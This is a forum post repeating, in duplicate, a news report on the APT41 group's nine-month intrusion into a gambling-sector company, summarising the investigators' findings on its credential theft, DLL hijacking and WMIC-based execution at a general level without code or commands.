Man
Professional
- Messages
- 3,070
- Reaction score
- 606
- Points
- 113
The illusion of security persists until it is too late.
The APT41 group carried out a cyberattack on the gambling sector, acting covertly and adapting its tools to information security activity. Also known as Brass Typhoon, Earth Baku, Wicked Panda, and Winnti, this cybercriminal association has been on the networks of a customer from the above industry for nearly nine months, collecting sensitive data and bypassing security systems.
The Israeli company Security Joes, which participated in the investigation of the incident, reported that the attackers extracted network configurations, user passwords and data from the LSASS process. The company's founder, Ido Naor, noted: "Hackers modified tools based on the actions of defenders, maintaining access and quietly changing strategies".
The attack used techniques similar to those observed in 'Operation Crimson Palace' tracked by Sophos. Naor also stressed that the malware campaign was likely financially motivated, despite government support.
APT41 used a sophisticated set of tactics to circumvent security measures and create covert remote access channels. One of the attack methods was DCSync — collecting password hashes to take over administrator accounts and expand access. Phantom DLL Hijacking attacks and legitimate system utilities such as "wmic.exe were also used".
Although the exact method of penetration into the network remains unknown, phishing emails were likely used, as no vulnerabilities of external applications or impact on the supply chain were detected. After penetration, the attackers focused on administrator and developer accounts to maintain control over the infrastructure.
Security Joes researchers found that the attackers temporarily stopped their activity after being detected, but later returned with an updated approach. They used obfuscated JavaScript code in an XSL file to execute malicious commands through the WMIC utility.
A feature of the campaign was the filtering of infected devices by IP addresses containing the substring "10.20.22", which indicates the intended use of VPN networks. This approach allowed attackers to target only the devices they were interested in.
Source
The APT41 group carried out a cyberattack on the gambling sector, acting covertly and adapting its tools to information security activity. Also known as Brass Typhoon, Earth Baku, Wicked Panda, and Winnti, this cybercriminal association has been on the networks of a customer from the above industry for nearly nine months, collecting sensitive data and bypassing security systems.
The Israeli company Security Joes, which participated in the investigation of the incident, reported that the attackers extracted network configurations, user passwords and data from the LSASS process. The company's founder, Ido Naor, noted: "Hackers modified tools based on the actions of defenders, maintaining access and quietly changing strategies".
The attack used techniques similar to those observed in 'Operation Crimson Palace' tracked by Sophos. Naor also stressed that the malware campaign was likely financially motivated, despite government support.
APT41 used a sophisticated set of tactics to circumvent security measures and create covert remote access channels. One of the attack methods was DCSync — collecting password hashes to take over administrator accounts and expand access. Phantom DLL Hijacking attacks and legitimate system utilities such as "wmic.exe were also used".
Although the exact method of penetration into the network remains unknown, phishing emails were likely used, as no vulnerabilities of external applications or impact on the supply chain were detected. After penetration, the attackers focused on administrator and developer accounts to maintain control over the infrastructure.
Security Joes researchers found that the attackers temporarily stopped their activity after being detected, but later returned with an updated approach. They used obfuscated JavaScript code in an XSL file to execute malicious commands through the WMIC utility.
A feature of the campaign was the filtering of infected devices by IP addresses containing the substring "10.20.22", which indicates the intended use of VPN networks. This approach allowed attackers to target only the devices they were interested in.
Source
